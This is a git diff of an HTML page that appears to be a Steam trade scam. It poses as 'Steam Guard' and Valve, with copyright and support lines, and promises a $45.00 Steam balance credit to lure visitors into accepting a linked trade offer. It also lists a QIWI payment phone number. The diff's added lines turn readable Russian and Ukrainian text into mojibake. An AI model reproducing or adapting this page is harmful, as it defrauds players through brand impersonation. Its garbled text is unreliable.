--- a/index.html
+++ b/index.html
@@ -1,18 +1,18 @@
 <!DOCTYPE html>
 <html>
 <head>
-<link rel="shortcut icon" href="img/favicon.ico" type="image/icon">                               <meta http-equiv="Content-Type" content"text/html;
+<link rel="shortcut icon" href="img/favicon" type="image/icon">                               <meta http-equiv="Content-Type" content"text/html;
 charset=UTF-8" />
 <meta name="keywords" content="test, site, website" />
-<meta name="description" content="Этот сайт является сайтом" />
+<meta name="description" content="ГќГІГ®ГІ Г±Г Г©ГІ ГїГўГ«ГїГҐГІГ±Гї Г±Г Г©ГІГ®Г¬" />
 <link href="css/style" rel="stylesheet" type="text/css" />
-<title>Ваш Steam Trade-Items Trading</title>
+<title>Г‚Г Гё Steam Trade-Items Trading</title>
 </head>
 <body bgcolor="#000" background="fon.png">
 </body>
 <header>
 <p><font color="#00ffff"><b>Steam Guard:</font> <font color="#ffffff">Your account will be credited the amount of <font color="#00ff33">$45.00</font> worth of Steam Money it will be available after you accept.</font></b></p>
-<p><font color="#ff0033">Если вы откажетесь от обмена, сумма будет возвращена владельцу.</p></font>
+<p><font color="#ff0033">Г…Г±Г«ГЁ ГўГ» Г®ГІГЄГ Г¦ГҐГІГҐГ±Гј Г®ГІ Г®ГЎГ¬ГҐГ­Г , Г±ГіГ¬Г¬Г  ГЎГіГ¤ГҐГІ ГўГ®Г§ГўГ°Г Г№ГҐГ­Г  ГўГ«Г Г¤ГҐГ«ГјГ¶Гі.</p></font>
 
    <p><font color="#00ffff">Registration Number:</font> <u><font color="#ffffff">C10680M</u></p></font>
    <p><font color="#00ffff">VAT ID:</font> <u><font color="#ffffff">LV22541915</u></p></font>
@@ -22,19 +22,19 @@ charset=UTF-8" />
    <p><font color="#ff6600">You QIWI:</font>  <font color="#ffffff">+79600300654</font>
    <p><i><font color="#ffcc33">Owner costs</font></i>: <u><font color="#00ff33">45.00$</font></u></p>
 <p><u>_____________________________________________________</u></p> 
- <p><i><font color="#ff99cc">Dota 2:  </font></i><font color="#ff6600">Demon Eater з карбуванням</font>, <font color="#ffffff">Totem of Deep Magma</font>, <font color="#ff6600">Basher of Mage Skulls з карбуванням</font>, <font color="#ffffff">Basher of Mage Skulls</font>.
+ <p><i><font color="#ff99cc">Dota 2:  </font></i><font color="#ff6600">Demon Eater Г§ ГЄГ Г°ГЎГіГўГ Г­Г­ГїГ¬</font>, <font color="#ffffff">Totem of Deep Magma</font>, <font color="#ff6600">Basher of Mage Skulls Г§ ГЄГ Г°ГЎГіГўГ Г­Г­ГїГ¬</font>, <font color="#ffffff">Basher of Mage Skulls</font>.
  <p><u>_____________________________________________________</u></p> 
          <p><i><font color="#ff99cc">CS:GO :</font></i>
         
          
    <p><u>_____________________________________________________</u></p> 
-<p><font color="#ff0033"><b>После того как вы отправите обмен, вам прийдет оповещание на телефон.</p></font></b>
+<p><font color="#ff0033"><b>ГЏГ®Г±Г«ГҐ ГІГ®ГЈГ® ГЄГ ГЄ ГўГ» Г®ГІГЇГ°Г ГўГЁГІГҐ Г®ГЎГ¬ГҐГ­, ГўГ Г¬ ГЇГ°ГЁГ©Г¤ГҐГІ Г®ГЇГ®ГўГҐГ№Г Г­ГЁГҐ Г­Г  ГІГҐГ«ГҐГґГ®Г­.</p></font></b>
  
 <center>
   <table id="tableColor" style="border: 4px solid;">
      <tr>
         <td>
-           <span style="font-family:Arial Black;color:orange;font-size:18px">ПРИМЕР, НАЖМИТЕ НА ЭТОТ ТРЕЙТ ДЛЯ ПОКУПКИ</span>
+           <span style="font-family:Arial Black;color:orange;font-size:18px">ГЏГђГ€ГЊГ…Гђ, ГЌГЂГ†ГЊГ€Г’Г… ГЌГЂ ГќГ’ГЋГ’ Г’ГђГ…Г‰Г’ Г„Г‹Гџ ГЏГЋГЉГ“ГЏГЉГ€</span>
      </td>
    </tr>
    </table>
@@ -44,14 +44,14 @@ charset=UTF-8" />
 </center>
 <center>
 <a href="https://steamcommunity.com/tradeoffer/new/?partner=191029898&token=-b3jam0O">
-<img src="fotot.png" alt="Обмен"> 
+<img src="fotot.png" alt="ГЋГЎГ¬ГҐГ­"> 
 <p><font color="#ffffff">After the trade your Steam Money Account Balance is active.</p>
   <p>You can check your account balance right after the trade is done to see the funds added.</p> 
 <p>If problem appears contact http//support.steampowered.com/.</p>
- <p>© Valve Corporation. All rights reserved, All trademarks are property of their respective owners</p>
+ <p>В© Valve Corporation. All rights reserved, All trademarks are property of their respective owners</p>
  <p><b>Steam Support<b>
     <u>support.steampowered.com</u> (?)</p>
-   <p>© Valve Corporation. Все права защищены. Все торговые марки являются собственностью соответствующих владельцев в США и других странах. Часть географических сведений на этом сайте предоставлена geonames.org.</font>	</p> </div>
+   <p>В© Valve Corporation. Г‚Г±ГҐ ГЇГ°Г ГўГ  Г§Г Г№ГЁГ№ГҐГ­Г». Г‚Г±ГҐ ГІГ®Г°ГЈГ®ГўГ»ГҐ Г¬Г Г°ГЄГЁ ГїГўГ«ГїГѕГІГ±Гї Г±Г®ГЎГ±ГІГўГҐГ­Г­Г®Г±ГІГјГѕ Г±Г®Г®ГІГўГҐГІГ±ГІГўГіГѕГ№ГЁГµ ГўГ«Г Г¤ГҐГ«ГјГ¶ГҐГў Гў Г‘ГГЂ ГЁ Г¤Г°ГіГЈГЁГµ Г±ГІГ°Г Г­Г Гµ. Г—Г Г±ГІГј ГЈГҐГ®ГЈГ°Г ГґГЁГ·ГҐГ±ГЄГЁГµ Г±ГўГҐГ¤ГҐГ­ГЁГ© Г­Г  ГЅГІГ®Г¬ Г±Г Г©ГІГҐ ГЇГ°ГҐГ¤Г®Г±ГІГ ГўГ«ГҐГ­Г  geonames.org.</font>	</p> </div>
    
 <br><br><br><br>
 </a>
